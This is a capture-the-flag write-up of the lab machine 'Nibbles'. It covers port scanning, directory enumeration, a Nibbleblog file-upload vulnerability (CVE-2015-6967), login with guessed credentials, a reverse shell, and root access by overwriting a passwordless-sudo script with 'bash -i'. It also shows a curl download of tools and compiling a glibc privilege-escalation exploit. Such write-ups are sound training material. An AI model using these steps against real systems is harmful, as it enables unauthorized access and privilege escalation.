Nibbles (Linux) Write-up - LinEnum & How to call a bash shell with sudo priv

I've done this box a long time ago while following a TCM's video, but I decided to give it a go again with fresh perspective. 
Nmap Scan Result: 
Nmap scan report for 10.129.168.232
Host is up (0.11s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp    open     http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
58848/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
​
​
Let's do web enumeration first. 
Visiting the IP, I found the nibbleblog directory which took me to a blog site. 
Started the gobuster from the directory: 
gobuster dir -u http://10.129.168.232/nibbleblog/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
content/ 
/themes/
/admin
/plugins
README
languages 
​
Version was found in:http://10.129.168.232/nibbleblog/README 
Version: v4.0.3
Codename: Coffee Release date: 2014-04-01
Site: http://www.nibbleblog.com Blog: http://blog.nibbleblog.com Help & Support: http://forum.nibbleblog.com Documentation: http://docs.nibbleblog.com
Vuln:CVE-2015-6967 
"Unrestricted file upload vulnerability in the My Image plugin in Nibbleblog before 4.0.5 allows remote administrators to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in content/private/plugins/my_image/image.php."
​
Found admin.php page and attempted login with Username:admin password: nibbles ---> successful 
 
Found a directory where I can upload a reverse shell script. 
Uploaded a reverse shell and got the shell back. 
can't access tty though. 
"bash -i" to make it interactive. 
or python3 pty option
​
By typing sudo -l reveals that /home/nibbler/personal/stuff/monitor.sh can be ran as root without password
so I have unzipped the file (unzip personal.zip) and removed the current shell file.
Created a new file with vim: 
#!/bin/bash 
bash -i 
We utilized the Sudo functionality to run a script to call the bash with root privilege. 
​
​
Running Linux Exploit Suggester 
GitHub - mzet-/linux-exploit-suggester: Linux privilege escalation auditing tool
GitHub
host it on python simplehttp server and download it from the nibble server with 
curl -o enum.sh IP/enum.sh 
​
 
We'll try the RationalLove 
glibc < 2.26 - 'getcwd()' Local Privilege Escalation
Exploit Database
Get the exploit and upload it again. 
We need to compile the c file with gcc -o FILE_NAME Rationallove.c 
 
For some reason, I had to execute it twice to get it work, but it worked! 
​
Additional resources for this box: 
Nibbleblog File Upload Vulnerability
Rapid7
GitHub - dix0nym/CVE-2015-6967: Nibbleblog 4.0.3 - Arbitrary File Upload (CVE-2015-6967)
GitHub
​
Devel (Windows)
Bashed
Last modified 1yr ago